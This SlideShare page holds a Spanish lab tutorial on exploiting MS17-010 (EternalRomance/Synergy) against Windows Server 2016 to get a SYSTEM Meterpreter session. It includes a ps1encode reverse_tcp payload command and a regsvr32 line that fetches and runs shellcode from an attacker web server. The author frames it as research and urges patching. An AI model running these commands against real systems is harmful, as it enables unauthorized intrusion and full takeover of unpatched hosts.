SlideShare una empresa de Scribd logo
1 de 13
Descargar para leer sin conexión
EXPLOTAR ETERNALROMANCE/SYNERGY EN WINDOWS SERVER 2016 1
EXPLOTAR ETERNALROMANCE/SYNERGY PARA OBTENER UNA
SHELL DE METERPRETER EN WINDOWS SERVER 2016
Sheila A. Berta (@UnaPibaGeek) – Security Researcher at Eleven Paths
shey.x7@gmail.com || sheila.berta@11paths.com
Julio 12, 2017
EXPLOTAR ETERNALROMANCE/SYNERGY EN WINDOWS SERVER 2016 2
Tabla de contenidos
EXPLOTAR ETERNALROMANCE/SYNERGY PARA OBTENER UNA SHELL DE METERPRETER EN WINDOWS
SERVER 2016.................................................................................................................................................1
Introducción..................................................................................................................................................3
Entorno de laboratorio..............................................................................................................................3
Obtención del exploit....................................................................................................................................5
Resolver dependencias..............................................................................................................................5
Comprobación de funcionamiento...............................................................................................................6
Datos de autenticación..............................................................................................................................6
Parámetros................................................................................................................................................6
Ejecución sin shellcode..............................................................................................................................7
Preparación de una shellcode.......................................................................................................................8
Generar archivo .SCT con PS1ENCODE......................................................................................................8
Permitir descarga de shellcode.sct............................................................................................................9
Alteración del comportamiento del exploit................................................................................................10
Ejecutar la shellcode................................................................................................................................10
Obtención de la sesión de meterpreter......................................................................................................11
Palabras finales… ........................................................................................................................................13
EXPLOTAR ETERNALROMANCE/SYNERGY EN WINDOWS SERVER 2016 3
Introducción
Cuando Microsoft publicó los parches para la vulnerabilidad MS17-010, quedó expuesto que el problema
afectaba desde Windows 7 (Vista en realidad, pero bueno, ese no cuenta :p) hasta Windows Server 2016.
Sin embargo, la serie de exploits “ETERNALS” publicados por TheShadowBrokers, presentan gran
inestabilidad al intentar impactar sistemas con Windows Server 2012 en adelante, provocando la mayoría
de las veces un BSOD en el equipo atacado.
Con el objetivo de entender su funcionamiento y mejorarlos, los exploits de la NSA que se hicieron
públicos, han pasado por la lupa de muchos investigadores. Gracias a ello, hace pocos días se publicó un
exploit que aprovecha el bug de ETERNALROMANCE/SYNERGY, con mejoras en el método de explotación,
para hacerlo más estable al momento de atacar sistemas con Windows Server 2012 y 2016. Pero lo cierto
es que, al fiel estilo de su autor (Sleepya), si se quiere utilizar dicho exploit es necesario ingeniárselas un
poco, entender cómo funciona y modificar algunas pequeñas cosas para lograr que, al momento de
impactar un objetivo, ocurra lo que nosotros deseemos.
Es por eso que tras haberlo analizado, aquí estoy escribiendo un nuevo “how to” :). En este paso a paso
se explica todo lo necesario para hacer funcionar el exploit de Sleepya correctamente y cómo modificar
su comportamiento con el fin de obtener una sesión de meterpreter sobre el equipo objetivo.
Por supuesto, esta documentación es con fines de investigación.
Entorno de laboratorio
Para montar el entorno de laboratorio, es necesario configurar los siguientes equipos:
1. Máquina objetivo - Windows Server 2016
Una máquina con Windows Server 2016 de 64bits será utilizada como target.
Luego de la instalación del sistema, no es necesario realizar cambios en el mismo, simplemente conocer
su dirección IP y asegurarse de que esté encendido al realizar el ataque.
2. Máquina atacante – Preferentemente GNU/Linux
Es posible utilizar cualquier sistema como máquina atacante, siempre y cuando se puedan ejecutar
correctamente las siguientes herramientas:
EXPLOTAR ETERNALROMANCE/SYNERGY EN WINDOWS SERVER 2016 4
• Python v2.7 - https://www.python.org/download/releases/2.7/
• Ps1Encode - https://github.com/CroweCybersecurity/ps1encode
• Metasploit Framework - https://github.com/rapid7/metasploit-framework
A continuación, el resumen de las configuraciones en el laboratorio:
• Windows Server 2016 x64 – IP: 10.0.2.13  Target.
• GNU/Linux Debian x64 – IP: 10.0.2.6  Atacante.
EXPLOTAR ETERNALROMANCE/SYNERGY EN WINDOWS SERVER 2016 5
Obtención del exploit
El código fue publicado en exploit-db y puede ser descargado desde siguiente enlace:
https://www.exploit-db.com/exploits/42315/.
Como podemos observar, está escrito en Python, por lo tanto lo guardamos con extensión .py en la
máquina atacante. Una vez hecho esto, si lo ejecutamos nos encontraremos con el siguiente error:
A continuación se explica cómo solventar este problema.
Resolver dependencias
En línea número tres del exploit se importa el módulo “mysmb”, el cual no es propio de Python ni podemos
instalarlo usando pip. Este módulo fue desarrollado por Sleepya y tendremos que descargarlo desde su
github en el siguiente link: https://github.com/worawit/MS17-010/blob/master/mysmb.py.
Lo guardamos con el nombre de “mysmb.py” en la misma carpeta donde hemos descargado el exploit.
Recordemos que en Python, para que un script pueda importar el código de un módulo, es necesario crear
un archivo llamado “__INIT__.py” donde se encuentren los mismos.
Al hacer esto, el script del exploit encontrará el módulo necesario y no mostrará más errores.
EXPLOTAR ETERNALROMANCE/SYNERGY EN WINDOWS SERVER 2016 6
Comprobación de funcionamiento
Es posible verificar el correcto funcionamiento del exploit sin hacer demasiadas modificaciones. Si lo
ejecutamos tal como está, una vez que la explotación sea exitosa creará un archivo llamado “pwned.txt”
en la unidad “C:” del equipo atacado.
Aunque esta simple comprobación no requiere que modifiquemos nada del exploit en sí, debemos definir
igualmente algunos datos y parámetros que veremos a continuación.
Datos de autenticación
El bug que explota ETERNALROMANCE/SYNERGY requiere que el ataque sea autenticado. Bien podría ser
a través de una cuenta Guest si está habilitada, sino, tendremos que obtener el usuario y contraseña de
alguna cuenta en el equipo objetivo. Es importante destacar que no importan los privilegios de la cuenta,
aun si fuera “Guest”, los privilegios que obtendremos al impactar serán de SYSTEM.
Para definir esta información, debemos abrir el exploit.py con cualquier editor de texto y dirigirnos a las
líneas 26 y 27:
Allí podremos definir el usuario y contraseña a utilizar para la autenticación.
Parámetros
El exploit necesita que definamos dos parámetros: la IP del objetivo y el pipe name. El protocolo SMB
define que un recurso compartido puede ser de tres tipos diferentes:
- File: archivo o disco, incluyendo subdirectorios.
- Print: recursos para impresión.
- Pipe: comunicación entre procesos siguiendo el modelo FIFO, donde se conoce como named pipes
a aquellas conexiones que siguen vivas mientras el sistema siga en funcionamiento más allá de
que el proceso ya no se encuentre activo.
A diferencia de ETERNALBLUE, los exploits ETERNALROMANCE y ETERNALSYNERGY explotan un bug en el
acceso a named pipes, es por eso que es necesario definir cuál se utilizará al momento de impactar.
Personalmente suelo utilizar “spoolss”, otra opción es “browser”. También es posible utilizar el escáner
de metasploit: auxiliary/scanner/smb/pipe_auditor y ver cuáles se encuentran accesibles en el sistema
objetivo.
EXPLOTAR ETERNALROMANCE/SYNERGY EN WINDOWS SERVER 2016 7
Ejecución sin shellcode
Sin más, procedemos a ejecutar el exploit con el siguiente comando:
python exploit.py <ip_objetivo> spoolss
Tal como se mencionó antes, si la explotación fue exitosa veremos que se ha creado un archivo llamado
“pwned.txt” en la unidad “C:” del equipo atacado.
Haber logrado la explotación con éxito es un gran paso. A continuación, veremos cómo sacar mayor
provecho, modificando este último comportamiento en el exploit con el objetivo de ejecutar una shell
de meterpreter.
EXPLOTAR ETERNALROMANCE/SYNERGY EN WINDOWS SERVER 2016 8
Preparación de una shellcode
Hay muchas formas de lograr que el exploit ejecute una shell de meterpreter o cualquier otra acción en
lugar de simplemente escribir aquel archivo.
El primer paso es generar la shellcode que usaremos, para hacerlo utilizaré una forma que personalmente
me gusta mucho y tiene numerosas ventajas a la hora de evadir controles de seguridad.
En resumen, la shellcode estará en un archivo .SCT que el exploit se encargará de descargar y ejecutar en
la máquina objetivo, devolviéndonos como resultado la tan ansiada sesión de meterpreter.
Generar archivo .SCT con PS1ENCODE
Ps1Encode es una herramienta muy útil que permite generar y codificar payloads de metasploit en
diversos formatos basados en PowerShell. Podemos obtenerla desde su github:
https://github.com/CroweCybersecurity/ps1encode.
Para generar el payload que necesitamos, ejecutaremos la herramienta con los siguientes parámetros:
ruby ps1encode.rb --PAYLOAD windows/meterpreter/reverse_tcp --LHOST=<IP_ATACANTE> --
LPORT=4444 -t sct
El archivo .sct que estamos generando, tendremos que almacenarlo en un web server en la máquina
atacante o en cualquier otro equipo que pueda ser accedido sin problemas por la máquina objetivo. Es
por ello que, al ejecutar el comando anterior, la herramienta nos pregunta cuál será la URL completa
donde alojaremos el archivo .sct. Si vamos a usar la propia máquina atacante, simplemente ingresamos:
http://<IP_ATACANTE>.
EXPLOTAR ETERNALROMANCE/SYNERGY EN WINDOWS SERVER 2016 9
Permitir descarga de shellcode.sct
El paso anterior nos generó un archivo llamado index.sct en la carpeta de ps1encode. Para que el mismo
pueda ser descargado por el exploit en la máquina objetivo, debemos moverlo a la carpeta del servidor
web y asignarle los permisos adecuados.
Tras realizar la ejecución de los comandos que vemos en la imagen superior, tendremos la shellcode
lista para ser usada.
EXPLOTAR ETERNALROMANCE/SYNERGY EN WINDOWS SERVER 2016 10
Alteración del comportamiento del exploit
Si abrimos el exploit con un editor de texto y nos dirigimos a la línea 463 en adelante, nos encontraremos
con lo siguiente:
Allí vemos las funciones que el exploit utiliza para crear el archivo “pwned.txt” en la máquina atacada,
pero más interesante aún, es la línea por debajo de ellas, donde se encuentra comentada la función
service_exec().
Si observamos, aquella función ejecuta el comando “copy” como ejemplo, creando una copia de
“pwned.txt”. Esto no se ejecutará a menos que quitemos el numeral (#) que precede a la función. Si lo
hacemos y volvemos a ejecutar el exploit, notaremos que en la unidad “C:” tendremos dos archivos de
texto: pwned.txt y pwned_exec.txt.
Es claro que podemos modificar el comando copy por cualquier otro que ejecute lo que nosotros
deseemos.
Ejecutar la shellcode
Ahora que conocemos donde modificar el exploit para cambiar su comportamiento final, editaremos la
línea que invoca a la función service_exec() para que ejecute el comando que se encargará de descargar y
ejecutar la shell de meterpreter:
regsvr32 /s /n /u /i:http://<ip_atacante_webserver>/shellcode.sct scrobj.dll
El exploit quedará de la siguiente forma:
EXPLOTAR ETERNALROMANCE/SYNERGY EN WINDOWS SERVER 2016 11
Obtención de la sesión de meterpreter
Finalmente, antes de realizar la ejecución del exploit.py, configuramos el exploit/multi/handler de
metasploit para recibir la sesión de meterpreter.
Volvemos a ejecutar el exploit guardando las modificaciones que hemos realizado en el paso anterior.
EXPLOTAR ETERNALROMANCE/SYNERGY EN WINDOWS SERVER 2016 12
Tras unos pocos segundos, obtendremos la sesión de meterpreter en la máquina objetivo, con privilegios
de SYSTEM.
EXPLOTAR ETERNALROMANCE/SYNERGY EN WINDOWS SERVER 2016 13
Palabras finales…
No hay tiempo para palabras finales, ve a parchear tus sistemas :-).
Agradecimientos:
Worawit Wang (@sleepya_).
Por bancarme siempre:
Claudio Caracciolo (@holesec).
Mateo Martinez (@MateoMartinezOK).
Luciano Martins (@clucianomartins).
Arturo Busleiman (@buanzo).
Ezequiel Sallis (@simubucks).
Cristian Borghello (@crisborghe / @seguinfo).
Sol O. (@0zz4n5).
@DragonJar || @ekoparty || “Las Pibas de Infosec”.
--
Sheila A. Berta - @UnaPibaGeek.

Más contenido relacionado

La actualidad más candente

Informatica forense: Recuperación de la Evidencia Digital.
Informatica forense: Recuperación de la Evidencia Digital.Informatica forense: Recuperación de la Evidencia Digital.
Informatica forense: Recuperación de la Evidencia Digital.Internet Security Auditors
 
Manual de Instalación y configuración Zimbra
Manual de Instalación  y configuración Zimbra Manual de Instalación  y configuración Zimbra
Manual de Instalación y configuración Zimbra Ignacio Lozano
 
Sistemas paralelos vs distribuidos
Sistemas paralelos vs distribuidosSistemas paralelos vs distribuidos
Sistemas paralelos vs distribuidosJesús Navarro
 
Modelo de madurez de aseguramiento de software
Modelo de madurez de aseguramiento de softwareModelo de madurez de aseguramiento de software
Modelo de madurez de aseguramiento de softwareSoftware Guru
 
Oracle vm virtualbox
Oracle vm virtualboxOracle vm virtualbox
Oracle vm virtualboxgianca_reina
 
Índice del Libro "Ciberestafas: La historia de nunca acabar" de 0xWord
Índice del Libro "Ciberestafas: La historia de nunca acabar" de 0xWordÍndice del Libro "Ciberestafas: La historia de nunca acabar" de 0xWord
Índice del Libro "Ciberestafas: La historia de nunca acabar" de 0xWordTelefónica
 
Aplicación del aprendizaje automático con árboles de decisión al estudio de l...
Aplicación del aprendizaje automático con árboles de decisión al estudio de l...Aplicación del aprendizaje automático con árboles de decisión al estudio de l...
Aplicación del aprendizaje automático con árboles de decisión al estudio de l...jjsch01
 
Manual packet-tracer-5 v1
Manual packet-tracer-5 v1Manual packet-tracer-5 v1
Manual packet-tracer-5 v1cyberleon95
 
Fundamentos de programación librería string C++
Fundamentos de programación librería string C++Fundamentos de programación librería string C++
Fundamentos de programación librería string C++Milton Nicolay
 
Sistemaoperativos lared-martinez
Sistemaoperativos lared-martinezSistemaoperativos lared-martinez
Sistemaoperativos lared-martinezDouglas Crampton
 
1.3 lenguajes de simulacion y simuladores
1.3 lenguajes de simulacion y simuladores1.3 lenguajes de simulacion y simuladores
1.3 lenguajes de simulacion y simuladoresJoOsee Kette
 
Objetivos de la seguridad informatica y posibles riesgos
Objetivos de la seguridad informatica y posibles riesgosObjetivos de la seguridad informatica y posibles riesgos
Objetivos de la seguridad informatica y posibles riesgosSen Alonzo
 
Clase de Administración de Instituciones Públicas del 23.09.21
Clase de Administración de Instituciones Públicas del 23.09.21Clase de Administración de Instituciones Públicas del 23.09.21
Clase de Administración de Instituciones Públicas del 23.09.21Andrés Castro Sánchez
 
Puerta tracera o Back Door
Puerta tracera o Back DoorPuerta tracera o Back Door
Puerta tracera o Back DoorSam Meci
 

La actualidad más candente (20)

Informatica forense: Recuperación de la Evidencia Digital.
Informatica forense: Recuperación de la Evidencia Digital.Informatica forense: Recuperación de la Evidencia Digital.
Informatica forense: Recuperación de la Evidencia Digital.
 
Manual de Instalación y configuración Zimbra
Manual de Instalación  y configuración Zimbra Manual de Instalación  y configuración Zimbra
Manual de Instalación y configuración Zimbra
 
Sistemas paralelos vs distribuidos
Sistemas paralelos vs distribuidosSistemas paralelos vs distribuidos
Sistemas paralelos vs distribuidos
 
Modelo de madurez de aseguramiento de software
Modelo de madurez de aseguramiento de softwareModelo de madurez de aseguramiento de software
Modelo de madurez de aseguramiento de software
 
Oracle vm virtualbox
Oracle vm virtualboxOracle vm virtualbox
Oracle vm virtualbox
 
Índice del Libro "Ciberestafas: La historia de nunca acabar" de 0xWord
Índice del Libro "Ciberestafas: La historia de nunca acabar" de 0xWordÍndice del Libro "Ciberestafas: La historia de nunca acabar" de 0xWord
Índice del Libro "Ciberestafas: La historia de nunca acabar" de 0xWord
 
INGENIERIA SOCIAL
INGENIERIA SOCIALINGENIERIA SOCIAL
INGENIERIA SOCIAL
 
Simulacion en Packet Tracer
Simulacion en Packet TracerSimulacion en Packet Tracer
Simulacion en Packet Tracer
 
Aplicación del aprendizaje automático con árboles de decisión al estudio de l...
Aplicación del aprendizaje automático con árboles de decisión al estudio de l...Aplicación del aprendizaje automático con árboles de decisión al estudio de l...
Aplicación del aprendizaje automático con árboles de decisión al estudio de l...
 
Manual packet-tracer-5 v1
Manual packet-tracer-5 v1Manual packet-tracer-5 v1
Manual packet-tracer-5 v1
 
Kernel o núcleo
Kernel o núcleoKernel o núcleo
Kernel o núcleo
 
Fundamentos de programación librería string C++
Fundamentos de programación librería string C++Fundamentos de programación librería string C++
Fundamentos de programación librería string C++
 
Nmap
NmapNmap
Nmap
 
Osstmm
OsstmmOsstmm
Osstmm
 
Sistemaoperativos lared-martinez
Sistemaoperativos lared-martinezSistemaoperativos lared-martinez
Sistemaoperativos lared-martinez
 
1.3 lenguajes de simulacion y simuladores
1.3 lenguajes de simulacion y simuladores1.3 lenguajes de simulacion y simuladores
1.3 lenguajes de simulacion y simuladores
 
Conoce la Seguridad Cognitiva
Conoce la Seguridad CognitivaConoce la Seguridad Cognitiva
Conoce la Seguridad Cognitiva
 
Objetivos de la seguridad informatica y posibles riesgos
Objetivos de la seguridad informatica y posibles riesgosObjetivos de la seguridad informatica y posibles riesgos
Objetivos de la seguridad informatica y posibles riesgos
 
Clase de Administración de Instituciones Públicas del 23.09.21
Clase de Administración de Instituciones Públicas del 23.09.21Clase de Administración de Instituciones Públicas del 23.09.21
Clase de Administración de Instituciones Públicas del 23.09.21
 
Puerta tracera o Back Door
Puerta tracera o Back DoorPuerta tracera o Back Door
Puerta tracera o Back Door
 

Similar a Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016

Cómo explotar EternalBlue en Windows Server 2012 R2
Cómo explotar EternalBlue en Windows Server 2012 R2Cómo explotar EternalBlue en Windows Server 2012 R2
Cómo explotar EternalBlue en Windows Server 2012 R2Telefónica
 
Corcuera pablo gestorincidenciasocs
Corcuera pablo gestorincidenciasocsCorcuera pablo gestorincidenciasocs
Corcuera pablo gestorincidenciasocspablo2017
 
Taller Kali Linux3: Rastreando Informacion y Objetivos -HackMadrid ene13
Taller Kali Linux3: Rastreando Informacion y Objetivos -HackMadrid ene13Taller Kali Linux3: Rastreando Informacion y Objetivos -HackMadrid ene13
Taller Kali Linux3: Rastreando Informacion y Objetivos -HackMadrid ene13peter69
 
Robo y crackeo del archivo sam en win nt 2000-xp
Robo y crackeo del archivo sam en win nt 2000-xpRobo y crackeo del archivo sam en win nt 2000-xp
Robo y crackeo del archivo sam en win nt 2000-xpAnxnLeg
 
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...Telefónica
 
Episodio de pentesting
Episodio de pentestingEpisodio de pentesting
Episodio de pentestingakencito
 
Trabajo final seguridad ofensiva defensiva
Trabajo final seguridad ofensiva defensivaTrabajo final seguridad ofensiva defensiva
Trabajo final seguridad ofensiva defensivaarbeycardona2
 
Proof of concept: Auditando sistema con METASPLOIT
Proof of concept: Auditando sistema con METASPLOITProof of concept: Auditando sistema con METASPLOIT
Proof of concept: Auditando sistema con METASPLOITBTshell-Fran
 
Armitage pruebas
Armitage pruebasArmitage pruebas
Armitage pruebasTensor
 
Armitage pruebas
Armitage pruebasArmitage pruebas
Armitage pruebasTensor
 
INSTALACION DE CENTOS Y OPENSSL
INSTALACION DE CENTOS Y OPENSSLINSTALACION DE CENTOS Y OPENSSL
INSTALACION DE CENTOS Y OPENSSLEdson Ortega
 
Cuckoosandbox
CuckoosandboxCuckoosandbox
CuckoosandboxTensor
 
Como monitorear asterisk utilizando nrpe de nagios
Como monitorear asterisk utilizando nrpe de nagiosComo monitorear asterisk utilizando nrpe de nagios
Como monitorear asterisk utilizando nrpe de nagiosGuillermo Henriquez Gonzalez
 
Manual de hacking basico por taskkill#3
Manual de hacking basico por taskkill#3Manual de hacking basico por taskkill#3
Manual de hacking basico por taskkill#3Brat Stell
 
Memoria Pruebas de intrusion mediante Metasploit Framework
Memoria Pruebas de intrusion mediante Metasploit FrameworkMemoria Pruebas de intrusion mediante Metasploit Framework
Memoria Pruebas de intrusion mediante Metasploit FrameworkErlaitzParreoMuoz
 
Como monitorear asterisk utilizando nrpe de nagios
Como monitorear asterisk utilizando nrpe de nagiosComo monitorear asterisk utilizando nrpe de nagios
Como monitorear asterisk utilizando nrpe de nagiosMcp Servicios
 
Cuckoo sandbox
Cuckoo sandboxCuckoo sandbox
Cuckoo sandboxTensor
 

Similar a Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016 (20)

Cómo explotar EternalBlue en Windows Server 2012 R2
Cómo explotar EternalBlue en Windows Server 2012 R2Cómo explotar EternalBlue en Windows Server 2012 R2
Cómo explotar EternalBlue en Windows Server 2012 R2
 
Present3
Present3Present3
Present3
 
Corcuera pablo gestorincidenciasocs
Corcuera pablo gestorincidenciasocsCorcuera pablo gestorincidenciasocs
Corcuera pablo gestorincidenciasocs
 
Taller Kali Linux3: Rastreando Informacion y Objetivos -HackMadrid ene13
Taller Kali Linux3: Rastreando Informacion y Objetivos -HackMadrid ene13Taller Kali Linux3: Rastreando Informacion y Objetivos -HackMadrid ene13
Taller Kali Linux3: Rastreando Informacion y Objetivos -HackMadrid ene13
 
Robo y crackeo del archivo sam en win nt 2000-xp
Robo y crackeo del archivo sam en win nt 2000-xpRobo y crackeo del archivo sam en win nt 2000-xp
Robo y crackeo del archivo sam en win nt 2000-xp
 
Ataque win xp
Ataque win xpAtaque win xp
Ataque win xp
 
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...
 
Episodio de pentesting
Episodio de pentestingEpisodio de pentesting
Episodio de pentesting
 
Trabajo final seguridad ofensiva defensiva
Trabajo final seguridad ofensiva defensivaTrabajo final seguridad ofensiva defensiva
Trabajo final seguridad ofensiva defensiva
 
Proof of concept: Auditando sistema con METASPLOIT
Proof of concept: Auditando sistema con METASPLOITProof of concept: Auditando sistema con METASPLOIT
Proof of concept: Auditando sistema con METASPLOIT
 
Armitage pruebas
Armitage pruebasArmitage pruebas
Armitage pruebas
 
Armitage pruebas
Armitage pruebasArmitage pruebas
Armitage pruebas
 
INSTALACION DE CENTOS Y OPENSSL
INSTALACION DE CENTOS Y OPENSSLINSTALACION DE CENTOS Y OPENSSL
INSTALACION DE CENTOS Y OPENSSL
 
Cuckoosandbox
CuckoosandboxCuckoosandbox
Cuckoosandbox
 
Como monitorear asterisk utilizando nrpe de nagios
Como monitorear asterisk utilizando nrpe de nagiosComo monitorear asterisk utilizando nrpe de nagios
Como monitorear asterisk utilizando nrpe de nagios
 
Sallis Usb Hacks
Sallis Usb HacksSallis Usb Hacks
Sallis Usb Hacks
 
Manual de hacking basico por taskkill#3
Manual de hacking basico por taskkill#3Manual de hacking basico por taskkill#3
Manual de hacking basico por taskkill#3
 
Memoria Pruebas de intrusion mediante Metasploit Framework
Memoria Pruebas de intrusion mediante Metasploit FrameworkMemoria Pruebas de intrusion mediante Metasploit Framework
Memoria Pruebas de intrusion mediante Metasploit Framework
 
Como monitorear asterisk utilizando nrpe de nagios
Como monitorear asterisk utilizando nrpe de nagiosComo monitorear asterisk utilizando nrpe de nagios
Como monitorear asterisk utilizando nrpe de nagios
 
Cuckoo sandbox
Cuckoo sandboxCuckoo sandbox
Cuckoo sandbox
 

Más de Telefónica

Índice de libro "Historias Cortas sobre Fondo Azul" de Willy en 0xWord
Índice de libro "Historias Cortas sobre Fondo Azul" de Willy en 0xWordÍndice de libro "Historias Cortas sobre Fondo Azul" de Willy en 0xWord
Índice de libro "Historias Cortas sobre Fondo Azul" de Willy en 0xWordTelefónica
 
Índice del libro: Máxima Seguridad en Windows: Secretos Técnicos. 6ª Edición ...
Índice del libro: Máxima Seguridad en Windows: Secretos Técnicos. 6ª Edición ...Índice del libro: Máxima Seguridad en Windows: Secretos Técnicos. 6ª Edición ...
Índice del libro: Máxima Seguridad en Windows: Secretos Técnicos. 6ª Edición ...Telefónica
 
Índice del libro "Hacking Web3: Challenge Acepted!" de 0xWord
Índice del libro "Hacking Web3: Challenge Acepted!" de 0xWordÍndice del libro "Hacking Web3: Challenge Acepted!" de 0xWord
Índice del libro "Hacking Web3: Challenge Acepted!" de 0xWordTelefónica
 
Índice del libro "Amazon Web Services: Hardening de Infraestructuras Cloud Co...
Índice del libro "Amazon Web Services: Hardening de Infraestructuras Cloud Co...Índice del libro "Amazon Web Services: Hardening de Infraestructuras Cloud Co...
Índice del libro "Amazon Web Services: Hardening de Infraestructuras Cloud Co...Telefónica
 
Índice del Libro "Ciberestafas: La historia de nunca acabar" (2ª Edición) de ...
Índice del Libro "Ciberestafas: La historia de nunca acabar" (2ª Edición) de ...Índice del Libro "Ciberestafas: La historia de nunca acabar" (2ª Edición) de ...
Índice del Libro "Ciberestafas: La historia de nunca acabar" (2ª Edición) de ...Telefónica
 
Índice del Libro "Storytelling para Emprendedores"
Índice del Libro "Storytelling para Emprendedores"Índice del Libro "Storytelling para Emprendedores"
Índice del Libro "Storytelling para Emprendedores"Telefónica
 
Digital Latches for Hacker & Developer
Digital Latches for Hacker & DeveloperDigital Latches for Hacker & Developer
Digital Latches for Hacker & DeveloperTelefónica
 
Índice del libro "Hardening de servidores GNU / Linux 5ª Edición (Gold Edition)"
Índice del libro "Hardening de servidores GNU / Linux 5ª Edición (Gold Edition)"Índice del libro "Hardening de servidores GNU / Linux 5ª Edición (Gold Edition)"
Índice del libro "Hardening de servidores GNU / Linux 5ª Edición (Gold Edition)"Telefónica
 
WhatsApp INT: OSINT en WhatsApp
WhatsApp INT: OSINT en WhatsAppWhatsApp INT: OSINT en WhatsApp
WhatsApp INT: OSINT en WhatsAppTelefónica
 
Índice del libro "De la Caverna al Metaverso" de 0xWord.com
Índice del libro "De la Caverna al Metaverso" de 0xWord.comÍndice del libro "De la Caverna al Metaverso" de 0xWord.com
Índice del libro "De la Caverna al Metaverso" de 0xWord.comTelefónica
 
20º Máster Universitario de Ciberseguridad UNIR
20º Máster Universitario de Ciberseguridad UNIR20º Máster Universitario de Ciberseguridad UNIR
20º Máster Universitario de Ciberseguridad UNIRTelefónica
 
BootCamp Online en DevOps (and SecDevOps) de GeeksHubs Academy
BootCamp Online en DevOps (and SecDevOps) de GeeksHubs AcademyBootCamp Online en DevOps (and SecDevOps) de GeeksHubs Academy
BootCamp Online en DevOps (and SecDevOps) de GeeksHubs AcademyTelefónica
 
Índice del libro "Ciberseguridad de tú a tú" de 0xWord
Índice del libro "Ciberseguridad de tú a tú"  de 0xWordÍndice del libro "Ciberseguridad de tú a tú"  de 0xWord
Índice del libro "Ciberseguridad de tú a tú" de 0xWordTelefónica
 
Índice del libro "Open Source INTelligence (OSINT): Investigar personas e Ide...
Índice del libro "Open Source INTelligence (OSINT): Investigar personas e Ide...Índice del libro "Open Source INTelligence (OSINT): Investigar personas e Ide...
Índice del libro "Open Source INTelligence (OSINT): Investigar personas e Ide...Telefónica
 
Índice del libro "Social Hunters" de 0xWord
Índice del libro "Social Hunters" de 0xWordÍndice del libro "Social Hunters" de 0xWord
Índice del libro "Social Hunters" de 0xWordTelefónica
 
Índice del libro "Kubernetes para profesionales: Desde cero al despliegue de ...
Índice del libro "Kubernetes para profesionales: Desde cero al despliegue de ...Índice del libro "Kubernetes para profesionales: Desde cero al despliegue de ...
Índice del libro "Kubernetes para profesionales: Desde cero al despliegue de ...Telefónica
 
Los retos sociales y éticos del Metaverso
Los retos sociales y éticos del MetaversoLos retos sociales y éticos del Metaverso
Los retos sociales y éticos del MetaversoTelefónica
 
Índice del libro "Docker: SecDevOps" 2ª Edición de 0xWord
Índice del libro "Docker: SecDevOps" 2ª Edición de 0xWordÍndice del libro "Docker: SecDevOps" 2ª Edición de 0xWord
Índice del libro "Docker: SecDevOps" 2ª Edición de 0xWordTelefónica
 
Índice del libro "Malware moderno: Técnicas avanzadas y su influencia en la i...
Índice del libro "Malware moderno: Técnicas avanzadas y su influencia en la i...Índice del libro "Malware moderno: Técnicas avanzadas y su influencia en la i...
Índice del libro "Malware moderno: Técnicas avanzadas y su influencia en la i...Telefónica
 
Índice del libro "Hacking Web Technologies" Silver Edition de 0xWord
Índice del libro "Hacking Web Technologies" Silver Edition de 0xWordÍndice del libro "Hacking Web Technologies" Silver Edition de 0xWord
Índice del libro "Hacking Web Technologies" Silver Edition de 0xWordTelefónica
 

Más de Telefónica (20)

Índice de libro "Historias Cortas sobre Fondo Azul" de Willy en 0xWord
Índice de libro "Historias Cortas sobre Fondo Azul" de Willy en 0xWordÍndice de libro "Historias Cortas sobre Fondo Azul" de Willy en 0xWord
Índice de libro "Historias Cortas sobre Fondo Azul" de Willy en 0xWord
 
Índice del libro: Máxima Seguridad en Windows: Secretos Técnicos. 6ª Edición ...
Índice del libro: Máxima Seguridad en Windows: Secretos Técnicos. 6ª Edición ...Índice del libro: Máxima Seguridad en Windows: Secretos Técnicos. 6ª Edición ...
Índice del libro: Máxima Seguridad en Windows: Secretos Técnicos. 6ª Edición ...
 
Índice del libro "Hacking Web3: Challenge Acepted!" de 0xWord
Índice del libro "Hacking Web3: Challenge Acepted!" de 0xWordÍndice del libro "Hacking Web3: Challenge Acepted!" de 0xWord
Índice del libro "Hacking Web3: Challenge Acepted!" de 0xWord
 
Índice del libro "Amazon Web Services: Hardening de Infraestructuras Cloud Co...
Índice del libro "Amazon Web Services: Hardening de Infraestructuras Cloud Co...Índice del libro "Amazon Web Services: Hardening de Infraestructuras Cloud Co...
Índice del libro "Amazon Web Services: Hardening de Infraestructuras Cloud Co...
 
Índice del Libro "Ciberestafas: La historia de nunca acabar" (2ª Edición) de ...
Índice del Libro "Ciberestafas: La historia de nunca acabar" (2ª Edición) de ...Índice del Libro "Ciberestafas: La historia de nunca acabar" (2ª Edición) de ...
Índice del Libro "Ciberestafas: La historia de nunca acabar" (2ª Edición) de ...
 
Índice del Libro "Storytelling para Emprendedores"
Índice del Libro "Storytelling para Emprendedores"Índice del Libro "Storytelling para Emprendedores"
Índice del Libro "Storytelling para Emprendedores"
 
Digital Latches for Hacker & Developer
Digital Latches for Hacker & DeveloperDigital Latches for Hacker & Developer
Digital Latches for Hacker & Developer
 
Índice del libro "Hardening de servidores GNU / Linux 5ª Edición (Gold Edition)"
Índice del libro "Hardening de servidores GNU / Linux 5ª Edición (Gold Edition)"Índice del libro "Hardening de servidores GNU / Linux 5ª Edición (Gold Edition)"
Índice del libro "Hardening de servidores GNU / Linux 5ª Edición (Gold Edition)"
 
WhatsApp INT: OSINT en WhatsApp
WhatsApp INT: OSINT en WhatsAppWhatsApp INT: OSINT en WhatsApp
WhatsApp INT: OSINT en WhatsApp
 
Índice del libro "De la Caverna al Metaverso" de 0xWord.com
Índice del libro "De la Caverna al Metaverso" de 0xWord.comÍndice del libro "De la Caverna al Metaverso" de 0xWord.com
Índice del libro "De la Caverna al Metaverso" de 0xWord.com
 
20º Máster Universitario de Ciberseguridad UNIR
20º Máster Universitario de Ciberseguridad UNIR20º Máster Universitario de Ciberseguridad UNIR
20º Máster Universitario de Ciberseguridad UNIR
 
